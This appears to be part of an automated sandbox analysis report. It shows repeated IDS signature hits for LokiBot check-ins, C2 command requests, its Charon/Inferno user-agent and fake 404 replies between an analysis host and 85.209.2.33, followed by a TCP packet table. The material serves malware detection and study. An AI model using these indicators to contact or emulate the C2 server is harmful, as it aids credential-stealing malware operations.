                                                            12/01/21-20:25:56.121105TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:56.121105TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:56.121105TCP2025381ET TROJAN LokiBot Checkin5009280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:56.121105TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009280192.168.11.2085.209.2.33
                                                            12/01/21-20:25:56.832683TCP2025483ET TROJAN LokiBot Fake 404 Response805009285.209.2.33192.168.11.20
                                                            12/01/21-20:25:57.226033TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:57.226033TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:57.226033TCP2025381ET TROJAN LokiBot Checkin5009380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:57.226033TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009380192.168.11.2085.209.2.33
                                                            12/01/21-20:25:58.038976TCP2025483ET TROJAN LokiBot Fake 404 Response805009385.209.2.33192.168.11.20
                                                            12/01/21-20:25:58.468649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:58.468649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:58.468649TCP2025381ET TROJAN LokiBot Checkin5009480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:58.468649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009480192.168.11.2085.209.2.33
                                                            12/01/21-20:25:59.304649TCP2025483ET TROJAN LokiBot Fake 404 Response805009485.209.2.33192.168.11.20
                                                            12/01/21-20:25:59.744868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:59.744868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:59.744868TCP2025381ET TROJAN LokiBot Checkin5009580192.168.11.2085.209.2.33
                                                            12/01/21-20:25:59.744868TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:00.613361TCP2025483ET TROJAN LokiBot Fake 404 Response805009585.209.2.33192.168.11.20
                                                            12/01/21-20:26:01.051034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:01.051034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:01.051034TCP2025381ET TROJAN LokiBot Checkin5009680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:01.051034TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:01.952824TCP2025483ET TROJAN LokiBot Fake 404 Response805009685.209.2.33192.168.11.20
                                                            12/01/21-20:26:02.394492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:02.394492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:02.394492TCP2025381ET TROJAN LokiBot Checkin5009780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:02.394492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:03.258290TCP2025483ET TROJAN LokiBot Fake 404 Response805009785.209.2.33192.168.11.20
                                                            12/01/21-20:26:03.685679TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:03.685679TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:03.685679TCP2025381ET TROJAN LokiBot Checkin5009880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:03.685679TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:04.540356TCP2025483ET TROJAN LokiBot Fake 404 Response805009885.209.2.33192.168.11.20
                                                            12/01/21-20:26:04.987712TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:04.987712TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:04.987712TCP2025381ET TROJAN LokiBot Checkin5009980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:04.987712TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:05.871008TCP2025483ET TROJAN LokiBot Fake 404 Response805009985.209.2.33192.168.11.20
                                                            12/01/21-20:26:06.313769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:06.313769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:06.313769TCP2025381ET TROJAN LokiBot Checkin5010080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:06.313769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:07.482206TCP2025483ET TROJAN LokiBot Fake 404 Response805010085.209.2.33192.168.11.20
                                                            12/01/21-20:26:07.919396TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:07.919396TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:07.919396TCP2025381ET TROJAN LokiBot Checkin5010180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:07.919396TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:09.172810TCP2025483ET TROJAN LokiBot Fake 404 Response805010185.209.2.33192.168.11.20
                                                            12/01/21-20:26:09.602842TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:09.602842TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:09.602842TCP2025381ET TROJAN LokiBot Checkin5010280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:09.602842TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:10.430050TCP2025483ET TROJAN LokiBot Fake 404 Response805010285.209.2.33192.168.11.20
                                                            12/01/21-20:26:10.842504TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:10.842504TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:10.842504TCP2025381ET TROJAN LokiBot Checkin5010380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:10.842504TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:11.544638TCP2025483ET TROJAN LokiBot Fake 404 Response805010385.209.2.33192.168.11.20
                                                            12/01/21-20:26:11.960090TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:11.960090TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:11.960090TCP2025381ET TROJAN LokiBot Checkin5010480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:11.960090TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:12.815572TCP2025483ET TROJAN LokiBot Fake 404 Response805010485.209.2.33192.168.11.20
                                                            12/01/21-20:26:13.237748TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:13.237748TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:13.237748TCP2025381ET TROJAN LokiBot Checkin5010580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:13.237748TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:14.026754TCP2025483ET TROJAN LokiBot Fake 404 Response805010585.209.2.33192.168.11.20
                                                            12/01/21-20:26:14.451161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:14.451161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:14.451161TCP2025381ET TROJAN LokiBot Checkin5010680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:14.451161TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:15.163532TCP2025483ET TROJAN LokiBot Fake 404 Response805010685.209.2.33192.168.11.20
                                                            12/01/21-20:26:15.596272TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:15.596272TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:15.596272TCP2025381ET TROJAN LokiBot Checkin5010780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:15.596272TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:16.286502TCP2025483ET TROJAN LokiBot Fake 404 Response805010785.209.2.33192.168.11.20
                                                            12/01/21-20:26:16.713577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:16.713577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:16.713577TCP2025381ET TROJAN LokiBot Checkin5010880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:16.713577TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:17.569057TCP2025483ET TROJAN LokiBot Fake 404 Response805010885.209.2.33192.168.11.20
                                                            12/01/21-20:26:18.001609TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:18.001609TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:18.001609TCP2025381ET TROJAN LokiBot Checkin5010980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:18.001609TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:18.874504TCP2025483ET TROJAN LokiBot Fake 404 Response805010985.209.2.33192.168.11.20
                                                            12/01/21-20:26:19.373185TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:19.373185TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:19.373185TCP2025381ET TROJAN LokiBot Checkin5011080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:19.373185TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:20.219604TCP2025483ET TROJAN LokiBot Fake 404 Response805011085.209.2.33192.168.11.20
                                                            12/01/21-20:26:20.632511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:20.632511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:20.632511TCP2025381ET TROJAN LokiBot Checkin5011180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:20.632511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:21.511191TCP2025483ET TROJAN LokiBot Fake 404 Response805011185.209.2.33192.168.11.20
                                                            12/01/21-20:26:21.949193TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:21.949193TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:21.949193TCP2025381ET TROJAN LokiBot Checkin5011280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:21.949193TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:22.663315TCP2025483ET TROJAN LokiBot Fake 404 Response805011285.209.2.33192.168.11.20
                                                            12/01/21-20:26:23.086345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:23.086345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:23.086345TCP2025381ET TROJAN LokiBot Checkin5011380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:23.086345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:23.822305TCP2025483ET TROJAN LokiBot Fake 404 Response805011385.209.2.33192.168.11.20
                                                            12/01/21-20:26:24.245794TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:24.245794TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:24.245794TCP2025381ET TROJAN LokiBot Checkin5011480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:24.245794TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:25.078419TCP2025483ET TROJAN LokiBot Fake 404 Response805011485.209.2.33192.168.11.20
                                                            12/01/21-20:26:25.513338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:25.513338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:25.513338TCP2025381ET TROJAN LokiBot Checkin5011580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:25.513338TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:26.253538TCP2025483ET TROJAN LokiBot Fake 404 Response805011585.209.2.33192.168.11.20
                                                            12/01/21-20:26:26.679721TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:26.679721TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:26.679721TCP2025381ET TROJAN LokiBot Checkin5011680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:26.679721TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:27.402511TCP2025483ET TROJAN LokiBot Fake 404 Response805011685.209.2.33192.168.11.20
                                                            12/01/21-20:26:27.831788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:27.831788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:27.831788TCP2025381ET TROJAN LokiBot Checkin5011780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:27.831788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:28.564290TCP2025483ET TROJAN LokiBot Fake 404 Response805011785.209.2.33192.168.11.20
                                                            12/01/21-20:26:28.963248TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:28.963248TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:28.963248TCP2025381ET TROJAN LokiBot Checkin5011880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:28.963248TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:29.712051TCP2025483ET TROJAN LokiBot Fake 404 Response805011885.209.2.33192.168.11.20
                                                            12/01/21-20:26:30.152202TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:30.152202TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:30.152202TCP2025381ET TROJAN LokiBot Checkin5011980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:30.152202TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:31.018116TCP2025483ET TROJAN LokiBot Fake 404 Response805011985.209.2.33192.168.11.20
                                                            12/01/21-20:26:31.399688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:31.399688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:31.399688TCP2025381ET TROJAN LokiBot Checkin5012080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:31.399688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:35.294948TCP2025483ET TROJAN LokiBot Fake 404 Response805012085.209.2.33192.168.11.20
                                                            12/01/21-20:26:35.733512TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:35.733512TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:35.733512TCP2025381ET TROJAN LokiBot Checkin5012180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:35.733512TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:36.679430TCP2025483ET TROJAN LokiBot Fake 404 Response805012185.209.2.33192.168.11.20
                                                            12/01/21-20:26:37.099429TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:37.099429TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:37.099429TCP2025381ET TROJAN LokiBot Checkin5012280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:37.099429TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:37.843637TCP2025483ET TROJAN LokiBot Fake 404 Response805012285.209.2.33192.168.11.20
                                                            12/01/21-20:26:38.262049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:38.262049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:38.262049TCP2025381ET TROJAN LokiBot Checkin5012380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:38.262049TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012380192.168.11.2085.209.2.33
                                                            12/01/21-20:26:38.993788TCP2025483ET TROJAN LokiBot Fake 404 Response805012385.209.2.33192.168.11.20
                                                            12/01/21-20:26:39.431935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:39.431935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:39.431935TCP2025381ET TROJAN LokiBot Checkin5012480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:39.431935TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012480192.168.11.2085.209.2.33
                                                            12/01/21-20:26:40.344338TCP2025483ET TROJAN LokiBot Fake 404 Response805012485.209.2.33192.168.11.20
                                                            12/01/21-20:26:40.783933TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:40.783933TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:40.783933TCP2025381ET TROJAN LokiBot Checkin5012580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:40.783933TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012580192.168.11.2085.209.2.33
                                                            12/01/21-20:26:41.669487TCP2025483ET TROJAN LokiBot Fake 404 Response805012585.209.2.33192.168.11.20
                                                            12/01/21-20:26:42.100927TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:42.100927TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:42.100927TCP2025381ET TROJAN LokiBot Checkin5012680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:42.100927TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012680192.168.11.2085.209.2.33
                                                            12/01/21-20:26:43.013392TCP2025483ET TROJAN LokiBot Fake 404 Response805012685.209.2.33192.168.11.20
                                                            12/01/21-20:26:43.433482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:43.433482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:43.433482TCP2025381ET TROJAN LokiBot Checkin5012780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:43.433482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012780192.168.11.2085.209.2.33
                                                            12/01/21-20:26:44.261592TCP2025483ET TROJAN LokiBot Fake 404 Response805012785.209.2.33192.168.11.20
                                                            12/01/21-20:26:44.665163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:44.665163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:44.665163TCP2025381ET TROJAN LokiBot Checkin5012880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:44.665163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012880192.168.11.2085.209.2.33
                                                            12/01/21-20:26:45.601489TCP2025483ET TROJAN LokiBot Fake 404 Response805012885.209.2.33192.168.11.20
                                                            12/01/21-20:26:45.941644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:45.941644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:45.941644TCP2025381ET TROJAN LokiBot Checkin5012980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:45.941644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012980192.168.11.2085.209.2.33
                                                            12/01/21-20:26:46.859197TCP2025483ET TROJAN LokiBot Fake 404 Response805012985.209.2.33192.168.11.20
                                                            12/01/21-20:26:47.298239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:47.298239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:47.298239TCP2025381ET TROJAN LokiBot Checkin5013080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:47.298239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013080192.168.11.2085.209.2.33
                                                            12/01/21-20:26:48.225858TCP2025483ET TROJAN LokiBot Fake 404 Response805013085.209.2.33192.168.11.20
                                                            12/01/21-20:26:48.650226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:48.650226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:48.650226TCP2025381ET TROJAN LokiBot Checkin5013180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:48.650226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013180192.168.11.2085.209.2.33
                                                            12/01/21-20:26:49.342811TCP2025483ET TROJAN LokiBot Fake 404 Response805013185.209.2.33192.168.11.20
                                                            12/01/21-20:26:49.783741TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:49.783741TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:49.783741TCP2025381ET TROJAN LokiBot Checkin5013280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:49.783741TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013280192.168.11.2085.209.2.33
                                                            12/01/21-20:26:50.499967TCP2025483ET TROJAN LokiBot Fake 404 Response805013285.209.2.33192.168.11.20

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 1, 2021 20:19:36.520427942 CET4981480192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:36.567555904 CET804981485.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:36.567697048 CET4981480192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:36.569315910 CET4981480192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:36.616686106 CET804981485.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:36.616878986 CET4981480192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:36.665183067 CET804981485.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:38.258430004 CET804981485.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:38.258769035 CET4981480192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:38.258866072 CET4981480192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:38.306296110 CET804981485.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:44.410706043 CET4981580192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:44.457541943 CET804981585.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:44.457736969 CET4981580192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:44.459399939 CET4981580192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:44.459459066 CET4981580192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:44.506288052 CET804981585.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:44.506336927 CET804981585.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:44.506390095 CET804981585.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:45.505903006 CET804981585.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:45.506269932 CET4981580192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:45.506371975 CET4981580192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:45.553344011 CET804981585.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:46.062834978 CET4981680192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:46.110106945 CET804981685.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:46.110310078 CET4981680192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:46.111846924 CET4981680192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:46.158931017 CET804981685.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:46.159183025 CET4981680192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:46.206309080 CET804981685.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:47.062947989 CET804981685.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:47.063153982 CET4981680192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:47.063205957 CET4981680192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:47.110424995 CET804981685.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:47.641752958 CET4981780192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:47.688857079 CET804981785.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:47.689074993 CET4981780192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:47.690591097 CET4981780192.168.11.2085.209.2.33
                                                            Dec 1, 2021 20:19:47.737732887 CET804981785.209.2.33192.168.11.20
                                                            Dec 1, 2021 20:19:47.738302946 CET4981780192.168.11.2085.209.2.33
